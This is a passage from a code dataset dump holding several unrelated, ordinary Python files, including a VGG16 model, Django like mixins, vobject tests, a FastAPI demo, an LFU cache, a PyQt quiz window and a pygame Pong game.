nets.network import Network\nfrom model.config import cfg\n\n\nclass vgg16(Network):\n    def __init__(self):\n        
Network.__init__(self)\n self._scope = 'vgg_16'\n\n def _image_to_head(self, is_training, reuse=None):\n with tf.variable_scope(self._scope, self._scope, reuse=reuse):\n net = slim.repeat(self._image, 2, slim.conv2d, 64, [3, 3],\n trainable=False, scope='conv1')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool1')\n net = slim.repeat(net, 2, slim.conv2d, 128, [3, 3],\n trainable=False, scope='conv2')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool2')\n net = slim.repeat(net, 3, slim.conv2d, 256, [3, 3],\n trainable=is_training, scope='conv3')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool3')\n net = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],\n trainable=is_training, scope='conv4')\n net = slim.max_pool2d(net, [2, 2], padding='SAME', scope='pool4')\n net = slim.repeat(net, 3, slim.conv2d, 512, [3, 3],\n trainable=is_training, scope='conv5')\n self._layers['head'] = net\n return net\n\n def _head_to_tail(self, pool5, is_training, reuse=None):\n with tf.variable_scope(self._scope, self._scope, reuse=reuse):\n pool5_flat = slim.flatten(pool5, scope='flatten')\n fc6 = slim.fully_connected(pool5_flat, 4096, scope='fc6')\n if is_training:\n fc6 = slim.dropout(fc6, keep_prob=0.5, is_training=True,\n scope='dropout6')\n fc7 = slim.fully_connected(fc6, 4096, scope='fc7')\n if is_training:\n fc7 = slim.dropout(fc7, keep_prob=0.5, is_training=True,\n scope='dropout7')\n return fc7\n\n def get_variables_to_restore(self, variables, var_keep_dic):\n variables_to_restore = []\n\n for v in variables:\n if v.name.split(':')[0] in var_keep_dic:\n print('Variables restored: %s' % v.name)\n variables_to_restore.append(v)\n return variables_to_restore\n","sub_path":"lib_drl/nets/vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427758344","text":"# ../memory/signature.py\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Python Imports\n# Binascii\nfrom binascii import unhexlify\n# OS\nfrom os import name as os_name\nif os_name != 'nt':\n os_name = 'linux'\n# Warnings\nfrom warnings import warn\n\n# Source.Python Imports\nfrom memory_c import Argument\nfrom memory_c import Convention\nfrom memory_c import Return\nfrom core import GAME_NAME\n# Memory\nfrom memory.modules import ModuleData\n\n\n# =============================================================================\n# >> CLASSES\n# =============================================================================\nclass Signature(object):\n '''Class used to call a dynamic function'''\n\n def __init__(self, ini):\n '''Called when the instance is initializes'''\n\n # Get the functions return type\n return_type = getattr(Return, ini['return_type'])\n\n # Get the module for the signature/symbol\n module = ini['module']\n\n # Fix any paths that use $gamename\n module = module.replace('$gamename', GAME_NAME)\n\n # Get the module instance\n module = ModuleData[module]\n\n # Is the server running on Windows?\n if os_name == 'nt':\n\n # Get the hex version of the signature\n func = unhexlify(ini['sig'].replace(' ', ''))\n\n # Is the server not running on Windows?\n else:\n\n # Use the symbol for Linux\n func = ini['symbol']\n\n # Get the address of the function\n address = module.find_address(func)\n\n # Was the function found?\n if not address:\n\n # Raise an 
error\n            raise ValueError('Unable to find address')\n\n        # Get the function's arguments\n        arguments = ini['arguments']\n\n        # Is there only one argument for this function?\n        if type(arguments) == str:\n\n            # Make a tuple with the argument type\n            arguments = tuple([getattr(Argument, arguments)])\n\n        # Are there multiple arguments for this function?\n        else:\n\n            # Get a tuple of the arguments\n            arguments = tuple([getattr(Argument, x) for x in arguments])\n\n        # Get the convention\n        convention = getattr(Convention, ini['convention'])\n\n        # Store the function for later use\n        self.function = address.make_function(\n            convention, arguments, return_type)\n\n    def __call__(self, *args):\n        '''Call the function with the given arguments'''\n        return self.function(*args)\n","sub_path":"addons/source-python/packages/source-python/memory/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102328229","text":"from rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom . import services\nfrom .serializers import FanSerializer, UnFanSerializer\n\n\nclass LikedMixin:\n    @action(detail=True, methods=['POST'])\n    def like(self, request, pk=None):\n        \"\"\"Likes `obj`.\n        \"\"\"\n        obj = self.get_object()\n        services.add_like(obj, request.user)\n        return Response()\n\n    @action(detail=True, methods=['POST'])\n    def unlike(self, request, pk=None):\n        \"\"\"Removes a like from `obj`.\n        \"\"\"\n        obj = self.get_object()\n        services.remove_like(obj, request.user)\n        return Response()\n\n    @action(detail=True, methods=['GET'])\n    def fans(self, request, pk=None):\n        \"\"\"Gets all users who liked `obj`.\n        \"\"\"\n        obj = self.get_object()\n        fans = services.get_fans(obj)\n        serializer = FanSerializer(fans, many=True)\n        return Response(serializer.data)\n\n\nclass DislikedMixin:\n    @action(detail=True, methods=['POST'])\n    def dislike(self, request, pk=None):\n        \"\"\"Dislikes `obj`.\n        \"\"\"\n        obj = self.get_object()\n        services.add_dislike(obj, request.user)\n        return Response()\n\n    @action(detail=True, methods=['POST'])\n    def undislike(self, request, pk=None):\n        \"\"\"Removes a dislike from `obj`.\n        \"\"\"\n        obj = self.get_object()\n        services.remove_dislike(obj, request.user)\n        return Response()\n\n    @action(detail=True, methods=['GET'])\n    def unfans(self, request, pk=None):\n        \"\"\"Gets all users who disliked `obj`.\n        \"\"\"\n        obj = self.get_object()\n        unfans = services.get_unfans(obj)\n        serializer = UnFanSerializer(unfans, many=True)\n        return Response(serializer.data)\n","sub_path":"likes/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195313427","text":"\"\"\"\nProvides streamlined access to the system console and getting information from the user.\n\"\"\"\n\n\ndef get_bool(prompt):\n    \"\"\"\n    Prompts the user with a yes/no question.\n\n    Args:\n        prompt: The prompt presented to the user.\n\n    Raises:\n        ValueError is raised if the user does not enter 'y', or 'n'.\n\n    Returns:\n        A boolean value. True if the user enters 'y', False if the user enters 'n'.\n    \n    Examples:\n        >>> fls.console.get_bool(\"Are you a programmer? (y/n): \")\n        Are you a programmer?: y\n        True\n        \n        >>> fls.console.get_bool(\"Are you a programmer? (y/n): \")\n        Are you a programmer?: n\n        False\n\n        >>> try:\n        ... 
fls.console.get_bool(\"Are you a programmer? (y/n): \")\n ... except ValueError:\n ... print \"Error!\"\n Are you a programmer?: x\n Error!\n \"\"\"\n user_input = raw_input(prompt)\n if user_input.lower() != 'y' and user_input.lower() !='n':\n raise ValueError\n return True if user_input.lower() == 'y' else False\n\n\ndef get_number(prompt, number_type=int):\n \"\"\"\n Prompts the user to enter a number.\n \n Args:\n prompt: The prompt presented to the user.\n number_type: The type of number. For example, int or float.as_integer_ratio\n\n Raises:\n ValueError is raised if the user doesn't input a number of number_type.\n\n Returns:\n Returns a number of type, number_type.\n \n Examples:\n >>> fls.console.get_number(\"Please enter a number: \", int)\n Please enter a number: 10\n 10\n \n >>> fls.console.get_number(\"Please enter a number: \", float)\n Please enter a number: 1.5\n 1.5\n \n >>> try:\n ... fls.console.get_number(\"Please enter a number: \", int)\n ... except ValueError:\n ... print \"Error!\"\n Please enter a number: This is a string.\n Error!\n \"\"\"\n user_input = raw_input(prompt)\n try:\n return number_type(user_input)\n except ValueError:\n raise ValueError","sub_path":"fls/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"114567194","text":"# -*- coding: utf-8 -*-\n'''\n tests.utils.vobject\n ~~~~~~~~~~~~~~~~\n\n :copyright: (c) 2014 Markus Unterwaditzer & contributors\n :license: MIT, see LICENSE for more details.\n'''\n\nimport pytest\n\nimport vdirsyncer.utils.vobject as vobject\n\nfrom .. import BARE_EVENT_TEMPLATE, EVENT_TEMPLATE, VCARD_TEMPLATE, \\\n normalize_item\n\n_simple_split = [\n VCARD_TEMPLATE.format(r=123),\n VCARD_TEMPLATE.format(r=345),\n VCARD_TEMPLATE.format(r=678)\n]\n\n_simple_joined = u'\\r\\n'.join(\n [u'BEGIN:VADDRESSBOOK'] +\n _simple_split +\n [u'END:VADDRESSBOOK\\r\\n']\n)\n\n\ndef test_split_collection_simple():\n given = list(vobject.split_collection(_simple_joined))\n\n assert [normalize_item(item) for item in given] == \\\n [normalize_item(item) for item in _simple_split]\n\n if vobject.ICALENDAR_ORIGINAL_ORDER_SUPPORT:\n assert [x.splitlines() for x in given] == \\\n [x.splitlines() for x in _simple_split]\n\n\ndef test_split_collection_multiple_wrappers():\n joined = u'\\r\\n'.join(\n u'BEGIN:VADDRESSBOOK\\r\\n' +\n x +\n u'\\r\\nEND:VADDRESSBOOK\\r\\n'\n for x in _simple_split\n )\n given = list(vobject.split_collection(joined))\n\n assert [normalize_item(item) for item in given] == \\\n [normalize_item(item) for item in _simple_split]\n\n if vobject.ICALENDAR_ORIGINAL_ORDER_SUPPORT:\n assert [x.splitlines() for x in given] == \\\n [x.splitlines() for x in _simple_split]\n\n\ndef test_split_collection_different_wrappers():\n with pytest.raises(ValueError) as exc_info:\n list(vobject.split_collection(u'BEGIN:VADDRESSBOOK\\r\\n'\n u'BEGIN:FOO\\r\\n'\n u'END:FOO\\r\\n'\n u'END:VADDRESSBOOK\\r\\n'\n u'BEGIN:VCALENDAR\\r\\n'\n u'BEGIN:FOO\\r\\n'\n u'END:FOO\\r\\n'\n u'END:VCALENDAR\\r\\n'))\n\n assert 'different types of components at top-level' in \\\n str(exc_info.value).lower()\n\n\ndef test_join_collection_simple():\n given = vobject.join_collection(_simple_split)\n assert normalize_item(given) == normalize_item(_simple_joined)\n if vobject.ICALENDAR_ORIGINAL_ORDER_SUPPORT:\n assert given.splitlines() == _simple_joined.splitlines()\n\n\ndef test_split_collection_timezones():\n items = [\n 
BARE_EVENT_TEMPLATE.format(r=123),\n BARE_EVENT_TEMPLATE.format(r=345)\n ]\n\n timezone = (\n u'BEGIN:VTIMEZONE\\r\\n'\n u'TZID:/mozilla.org/20070129_1/Asia/Tokyo\\r\\n'\n u'X-LIC-LOCATION:Asia/Tokyo\\r\\n'\n u'BEGIN:STANDARD\\r\\n'\n u'TZOFFSETFROM:+0900\\r\\n'\n u'TZOFFSETTO:+0900\\r\\n'\n u'TZNAME:JST\\r\\n'\n u'DTSTART:19700101T000000\\r\\n'\n u'END:STANDARD\\r\\n'\n u'END:VTIMEZONE'\n )\n\n full = u'\\r\\n'.join(\n [u'BEGIN:VCALENDAR'] +\n items +\n [timezone, u'END:VCALENDAR']\n )\n\n given = set(normalize_item(item)\n for item in vobject.split_collection(full))\n expected = set(\n normalize_item(u'\\r\\n'.join((\n u'BEGIN:VCALENDAR', item, timezone, u'END:VCALENDAR'\n )))\n for item in items\n )\n\n assert given == expected\n\n\ndef test_hash_item():\n a = EVENT_TEMPLATE.format(r=1)\n b = u'\\n'.join(line for line in a.splitlines()\n if u'PRODID' not in line and u'VERSION' not in line)\n assert vobject.hash_item(a) == vobject.hash_item(b)\n\n\ndef test_multiline_uid():\n a = (u'BEGIN:FOO\\r\\n'\n u'UID:123456789abcd\\r\\n'\n u' efgh\\r\\n'\n u'END:FOO\\r\\n')\n assert vobject.Item(a).uid == u'123456789abcdefgh'\n\n\ndef test_multiline_uid_complex():\n a = u'''\nBEGIN:VCALENDAR\nBEGIN:VTIMEZONE\nTZID:Europe/Rome\nX-LIC-LOCATION:Europe/Rome\nBEGIN:DAYLIGHT\nTZOFFSETFROM:+0100\nTZOFFSETTO:+0200\nTZNAME:CEST\nDTSTART:19700329T020000\nRRULE:FREQ=YEARLY;BYDAY=-1SU;BYMONTH=3\nEND:DAYLIGHT\nBEGIN:STANDARD\nTZOFFSETFROM:+0200\nTZOFFSETTO:+0100\nTZNAME:CET\nDTSTART:19701025T030000\nRRULE:FREQ=YEARLY;BYDAY=-1SU;BYMONTH=10\nEND:STANDARD\nEND:VTIMEZONE\nBEGIN:VEVENT\nDTSTART:20140124T133000Z\nDTEND:20140124T143000Z\nDTSTAMP:20140612T090652Z\nUID:040000008200E00074C5B7101A82E0080000000050AAABEEF50DCF0100000000000000\n 001000000062548482FA830A46B9EA62114AC9F0EF\nCREATED:20140110T102231Z\nDESCRIPTION:Test.\nLAST-MODIFIED:20140123T095221Z\nLOCATION:25.12.01.51\nSEQUENCE:0\nSTATUS:CONFIRMED\nSUMMARY:Präsentation\nTRANSP:OPAQUE\nEND:VEVENT\nEND:VCALENDAR\n '''.strip()\n assert vobject.Item(a).uid == (u'040000008200E00074C5B7101A82E008000000005'\n u'0AAABEEF50DCF0100000000000000001000000062'\n u'548482FA830A46B9EA62114AC9F0EF')\n","sub_path":"tests/utils/test_vobject.py","file_name":"test_vobject.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38966119","text":"import re\nimport sys\nimport datetime\nfrom pathlib import Path\nfrom decimal import Decimal\nfrom typing import List, Dict\n\nimport uvicorn\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI, Body, Response\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom middleware import LimitUploadSize\nfrom tags_metadata import api_tags_metadata\n\nbase_dir = Path(__file__).parent.parent\nrun_argv = sys.argv[0]\nDEBUG = None\nif run_argv.split('/')[-1] == 'app.py':\n DEBUG = True\nelse:\n DEBUG = False\nif DEBUG:\n app = FastAPI(openapi_tags=api_tags_metadata)\nelse:\n # app = FastAPI(docs_url=None, redoc_url=None, openapi_url=None)\n app = FastAPI(openapi_tags=api_tags_metadata) # 此处采用这种模式是方便部署到云服务器查看 api文档页面\n\n\nclass AddInputList(BaseModel):\n value_array: List[Dict[str, float]]\n\n\nclass ChatMsg(BaseModel):\n msg: str = Body(..., max_length=5 * 1024 * 1024)\n\n\n@app.on_event('startup')\nasync def startup():\n app.add_middleware(\n CORSMiddleware,\n allow_origins=['*'],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=['*'],\n )\n app.add_middleware(LimitUploadSize, max_upload_size=5 * 1024 * 1024) # 
限制接口请求数据大小为5M\n\n\n@app.post('/add', tags=['add'])\nasync def add(args: AddInputList, response: Response):\n \"\"\"\"\"\"\n result = Decimal('0')\n for data_item in args.value_array:\n result += Decimal(str(data_item.get('value')))\n return {'result': float(result)}\n\n\n@app.get('/get_date', tags=['get_date'])\nasync def get_date():\n beijing_timezone = datetime.timezone(datetime.timedelta(hours=8))\n beijing_date = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).astimezone(beijing_timezone).date()\n return {'date': beijing_date}\n\n\n@app.post('/chat', tags=['chat'])\nasync def chat(args: ChatMsg):\n # if re.search(r'(?isu)您好.*?再见|再见.*?您好', args.msg): # 长文本性能过差\n # return {'result': '天气不错。'}\n key = 0\n msg_dict = {0: '', 1: '您好,您吃了吗?', 3: '回见了您内。', 4: '天气不错。'}\n if re.search(r'(?isu)您好', args.msg):\n key += 1\n if re.search(r'(?isu)再见', args.msg):\n key += 3\n return {'result': msg_dict[key]}\n\n\ndef main():\n uvicorn.run(app, host=\"0.0.0.0\", port=5000)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"code/api_server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224748236","text":"import sys\nfrom algorithms.page_replacement_algorithm import page_replacement_algorithm\nfrom lib.disk_struct import Disk\n# sys.path.append(os.path.abspath(\"/home/giuseppe/))\n\n## Keep a LRU list.\n## Page hits:\n## Every time we get a page hit, mark the page and also move it to the MRU position\n## Page faults:\n## Evict an unmark page with the probability proportional to its position in the LRU list.\nclass LFU_DECAY(page_replacement_algorithm):\n\n def __init__(self, N,decay=0.99):\n self.T = Disk(N)\n self.N = N\n self.frequency = {}\n self.decayRate = decay\n \n def get_N(self) :\n return self.N\n\n def getMinValueFromCache(self, values):\n minpage,first = -1, True\n for q in self.T :\n if first or values[q] < values[minpage] :\n minpage,first=q,False\n return minpage\n \n def request(self,page) :\n page_fault = False\n \n if page in self.T :\n page_fault = False\n else :\n #if len(self.T) == self.N :\n if self.T.size() == self.N:\n ## Remove LRU page\n lfu = self.getMinValueFromCache(self.frequency)\n self.T.delete(lfu)\n del self.frequency[lfu]\n \n # Add page to the MRU position\n self.frequency[page] = 0\n self.T.add(page)\n page_fault = True\n \n for q in self.T :\n self.frequency[q] *= self.decayRate\n self.frequency[page] += 1\n \n return page_fault\n\n\n def get_data(self):\n # data = []\n # for i,p,m in enumerate(self.T):\n # data.append((p,m,i,0))\n # return data\n return [list(self.freq)]\n\n def get_list_labels(self) :\n return ['L']\n\n\n","sub_path":"algorithms/LFU_DECAY.py","file_name":"LFU_DECAY.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212064303","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtGui import *\nfrom PyQt5 import QtGui\nfrom test2_question2_window import Test2_Question2_Window\nfrom result2_window import Result_Window\n\nclass Test2_Question1_Window(QtWidgets.QMainWindow, QPushButton):\n def __init__(self, parent=None):\n super().__init__()\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle('사람에 관한 당신의 심리 상태')\n self.setWindowIcon(QIcon('./image/icon.png'))\n self.resize(880, 500)\n\n back = QLabel(\"\", self)\n back.resize(880, 500)\n back.move(0, 0)\n 
back.setStyleSheet('image:url(./image/background.png); border:0px;')\n\n        # Logo\n        logo = QLabel(\"\", self)\n        logo.resize(100, 50)\n        logo.move(30, 30)\n        logo.setStyleSheet('image:url(./image/logo.png); border:0px;')\n\n        # Test name\n        self.name_label = QLabel(\"이수빈\", self)\n        self.name_label.setFont(QtGui.QFont(\"맑은 고딕\", 13))\n        self.name_label.resize(80, 60)\n        self.name_label.move(40, 100)\n\n        self.label = QLabel(\" 의 사람에 관한 심리 상태는?\", self)\n        self.label.setFont(QtGui.QFont(\"맑은 고딕\", 13))\n        self.label.resize(800, 60)\n        self.label.move(40, 100)\n\n        # Question\n        self.q1 = QLabel(\"TV를 틀었을 때 화면에 나온 사람은?\", self)\n        self.q1.setFont(QtGui.QFont(\"맑은 고딕\", 20))\n        self.q1.resize(800, 60)\n        self.q1.move(40, 140)\n\n        # Answer button\n        # Receive the answer input\n        self.answer = QLineEdit(\"\", self)\n        self.answer.setFont(QtGui.QFont(\"맑은 고딕\", 20))\n        self.answer.setStyleSheet(\"overflow-x:hidden;\" \"overflow-y:hidden\")\n        self.answer.resize(800, 100)\n        self.answer.move(40, 210)\n\n        self.a = QPushButton(\"Next\", self)\n        self.a.setFont(QtGui.QFont(\"맑은 고딕\", 20))\n        self.a.resize(800, 100)\n        self.a.move(40, 320)\n        self.a.clicked.connect(self.a_click)\n\n        self.test2_question2_window = Test2_Question2_Window(self)\n        self.result2_window = Result_Window(self)\n\n    def a_click(self):\n        self.test2_question2_window.show()\n        user_name = self.name_label.text()\n        answer = self.answer.text()\n\n        self.test2_question2_window.name_label.setText(user_name)\n        self.test2_question2_window.t.setText(answer)\n        #self.result2_window.answer1.setText(answer)\n\n        print(user_name, \">>> TV를 틀었을 때 나온 사람은 ? >>> \", self.answer.text())\n\n        #print(self.name_label.text() + \" : a selected\")\n        if self.label.text() == \" is state of mind these days\":\n            self.test2_question2_window.label.setText(\" is state of mind these days\")\n            self.test2_question2_window.q1.setText(\"While you are walking down the street, a bug appeared in front of you. 
How many bugs are there?\")\n elif self.label.text() == \"最近の僕の心理状態。\":\n self.test2_question2_window.label.setText(\"最近の僕の心理状態。\")\n self.test2_question2_window.q1.setText(\"あなたが通りを歩いていると、目の前に虫が現れました。 バグはいくつありますか?\")\n self.hide()\n\n","sub_path":"test2_question1_window.py","file_name":"test2_question1_window.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"218354137","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nfrom scipy import ndimage\nfrom functions import *\nfrom tflite_runtime.interpreter import load_delegate\n\nsize = (250,250)\n\ncap = cv2.VideoCapture(0)\n\ninterpreter = tf.lite.Interpreter(model_path=\"../CNN_V2_git.tflite\",experimental_delegates=[load_delegate('libedgetpu.so.1.0')])\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\nheight = input_details[0]['shape'][1]\nwidth = input_details[0]['shape'][2]\n\nwhile True:\n _, frame = cap.read()\n #frame = cv2.cvtColor(frame,cv2.COLOR_BGR2RGB)\n cropped,box = find_card(frame)\n cropped = cv2.resize(cropped,(160,160))\n cropped_cpy = cropped.copy()\n \n cropped = cropped.astype(np.float32)\n input_data = np.expand_dims(cropped, axis=0)\n \n interpreter.set_tensor(input_details[0]['index'], input_data)\n interpreter.invoke()\n prediction = interpreter.get_tensor(output_details[0]['index'])\n pred_id=np.argmax(prediction,axis=-1)\n pred_label=CLASS_NAMES[int(pred_id)]\n \n frame = cv2.resize(frame,size)\n x,y,w,h = box[0]\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),1)\n cv2.putText(frame,pred_label,(x,y), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (0, 0, 0), 1, cv2.LINE_AA)\n frame = cv2.resize(frame,(750,750))\n cv2.imshow('frame',frame)\n #cv2.imshow('cropped',cropped)\n cv2.imshow('ROI',cropped_cpy)\n key = cv2.waitKey(1)\n \n#closing all open windows \ncv2.destroyAllWindows() \n\n\n\n\n","sub_path":"Core/one_card.py","file_name":"one_card.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"81018399","text":"import pygame\nimport time\n\ndisplay_size = (800, 600)\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\ngame_display = None\nroof_bound = 11.600000000007093\nfloor_bound = 590.4000000000592\npaddle_speed = 5\ninit_ball_speed = 4\nfps = 60\n\nclass Ball(object):\n def __init__(self, radius):\n self.x = int(display_size[0] / 2)\n self.y = int(display_size[1] / 2)\n self.radius = radius\n self.topbound = self.y - self.radius\n self.botbound = self.y + self.radius\n self.leftbound = self.x - self.radius\n self.rightbound = self.x + self.radius\n self.xvelo = init_ball_speed\n self.yvelo = init_ball_speed\n\n def wipe(self):\n pygame.draw.circle(game_display, black, (self.x, self.y), self.radius)\n\n def draw(self):\n pygame.draw.circle(game_display, white, (self.x, self.y), self.radius)\n\n def update(self):\n self.wipe()\n self.x += self.xvelo\n self.y += self.yvelo\n self.topbound = self.y - self.radius\n self.botbound = self.y + self.radius\n self.leftbound = self.x - self.radius\n self.rightbound = self.x + self.radius\n self.draw()\n pygame.display.update()\n\n def checkCollisions(self):\n for blocker in barriers:\n if blocker == top:\n if self.topbound - abs(self.yvelo) <= blocker.botbound:\n self.yvelo *= -1\n\n if blocker == bot:\n if self.botbound + self.yvelo >= blocker.topbound:\n self.yvelo *= -1\n\n if blocker == leftpad:\n 
if self.leftbound - abs(self.xvelo) <= blocker.rightbound:\n if blocker.botbound >= self.y - self.radius and blocker.topbound <= self.y + self.radius:\n self.xvelo = int((abs(self.y - (leftpad.y + leftpad.height / 2))//10)+4)\n\n if blocker == rightpad:\n if self.rightbound + self.xvelo >= blocker.leftbound:\n if blocker.botbound >= self.y - self.radius and blocker.topbound <= self.y + self.radius:\n self.xvelo = -int((abs(self.y - (rightpad.y + rightpad.height / 2))//10)+4)\n\n def checkEnd(self):\n if self.x <= leftpad.leftbound or self.x >= rightpad.rightbound:\n return False\n return True\n\n\nclass Barrier(object):\n def __init__(self, pos, width, height):\n self.x = pos[0]\n self.y = pos[1]\n self.width = width\n self.height = height\n self.topbound = self.y\n self.botbound = self.y + self.height\n self.leftbound = self.x\n self.rightbound = self.x + self.width\n\n def draw(self):\n pygame.draw.rect(game_display, white, (self.x, self.y, self.width, self.height))\n\n def wipe(self):\n pygame.draw.rect(game_display, black, (self.x, self.y, self.width, self.height))\n\n\nclass Paddle(Barrier):\n def move(self, distance):\n if distance < 0:\n if roof_bound >= self.y:\n return\n\n elif distance > 0:\n if floor_bound <= self.y + self.height + paddle_speed:\n return\n\n self.wipe()\n self.y += distance\n self.topbound = self.y\n self.botbound = self.y + self.height\n self.leftbound = self.x\n self.rightbound = self.x + self.width\n self.draw()\n pygame.display.update()\n\n\ndef initGame():\n pygame.init()\n\n global game_display, clock\n game_display = pygame.display.set_mode(display_size)\n pygame.display.set_caption(\"Pong\")\n clock = pygame.time.Clock()\n\n\ndef initObjects():\n global top, bot, leftpad, rightpad, ball, barriers\n\n ball = Ball(8)\n top = Barrier((0, 0), 800, 10)\n bot = Barrier((0, 590), 800, 10)\n leftpad = Paddle((0, 270), 10, 60)\n rightpad = Paddle((790, 270), 10, 60)\n barriers = [top, bot, leftpad, rightpad]\n\n top.draw()\n bot.draw()\n leftpad.draw()\n rightpad.draw()\n ball.draw()\n pygame.display.update()\n\n\ndef drawObjects():\n leftpad.wipe()\n rightpad.wipe()\n ball.wipe()\n leftpad.draw()\n rightpad.draw()\n ball.draw()\n pygame.display.update()\n\n\ndef game():\n w = False\n s = False\n up = False\n down = False\n run = True\n\n while run:\n run = ball.checkEnd()\n for event in pygame.event.get():\n try:\n if event.key == pygame.K_UP:\n if event.type == pygame.KEYUP:\n up = False\n if event.type == pygame.KEYDOWN:\n up = True\n if event.key == pygame.K_DOWN:\n if event.type == pygame.KEYUP:\n down = False\n if event.type == pygame.KEYDOWN:\n down = True\n if event.key == pygame.K_w:\n if event.type == pygame.KEYUP:\n w = False\n if event.type == pygame.KEYDOWN:\n w = True\n if event.key == pygame.K_s:\n if event.type == pygame.KEYUP:\n s = False\n if event.type == pygame.KEYDOWN:\n s = True\n\n except AttributeError:\n pass\n\n if event.type == pygame.QUIT:\n run = False\n\n if up:\n rightpad.move(-paddle_speed)\n\n elif down:\n rightpad.move(paddle_speed)\n\n if w:\n leftpad.move(-paddle_speed)\n\n elif s:\n leftpad.move(paddle_speed)\n\n ball.checkCollisions()\n ball.update()\n clock.tick(fps)\n\n for i in range(3, 0, -1):\n print(\"Ending in {0}\".format(i))\n time.sleep(1)\n pygame.quit()\n exit(0)\n\n\ninitGame()\ninitObjects()\ngame()\n","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418625716","text":"# 
vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2013 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport logging\n\nfrom tempest.openstack.common import cfg\n\nLOG = logging.getLogger(__name__)\n\ncli_opts = [\n cfg.BoolOpt('enabled',\n default=True,\n help=\"enable cli tests\"),\n cfg.StrOpt('cli_dir',\n default='/usr/local/bin/',\n help=\"directory where python client binaries are located\"),\n]\n\nCONF = cfg.CONF\ncli_group = cfg.OptGroup(name='cli', title=\"cli Configuration Options\")\nCONF.register_group(cli_group)\nCONF.register_opts(cli_opts, group=cli_group)\n","sub_path":"cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11600764","text":"import subprocess\n\nSTAGE = 'alpha'\n\nVERSION = (1, 2, 0, STAGE)\n\n\ndef get_version():\n number = '.'.join(map(str, VERSION[:3]))\n stage = VERSION[3]\n if stage == 'final':\n return number\n elif stage == 'alpha':\n process = subprocess.Popen('git rev-parse HEAD'.split(), stdout=subprocess.PIPE)\n stdout, stderr = process.communicate()\n return number + '-' + stdout.decode('utf-8').strip()[:8]\n","sub_path":"betterforms/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"571072582","text":"# This demos sprites using Pillow/PIL images\n# See here for more details:\n# https://pillow.readthedocs.io/en/stable/reference/Image.html\n\n# This uses a spritestrip from this tutorial:\n# https://www.codeandweb.com/texturepacker/tutorials/how-to-create-a-sprite-sheet\nfrom cmu_112_graphics import *\n\nclass DerekApp(Mode):\n def appStarted(self):\n self.initBattleImages()\n\n def initBattleImages(self):\n p1 = '/Users/tony/Desktop/15112/hack112/sprite.png'\n p2 = '/Users/tony/Desktop/15112/hack112/sprite7.png'\n url2 = '/Users/tony/Desktop/15112/hack112/text2.png'\n url3 = '/Users/tony/Desktop/15112/hack112/battleground.jpg'\n self.healthbars = self.app.classRoomMode.healthbars\n death='/Users/tony/Desktop/15112/hack112/death.png'\n win='/Users/tony/Desktop/15112/hack112/win.png'\n desk='/Users/tony/Desktop/15112/hack112/pixeldesk.png'\n self.deskImg = self.loadImage(desk)\n self.deathIcon= self.loadImage(death)\n self.winIcon= self.loadImage(win)\n self.imageText = self.loadImage(url2)\n self.battleground = self.loadImage(url3)\n self.x=self.width/2\n self.y=self.height/2\n spritestrip = self.loadImage(p1)\n spritestrip2 = self.loadImage(p2)\n ############\n 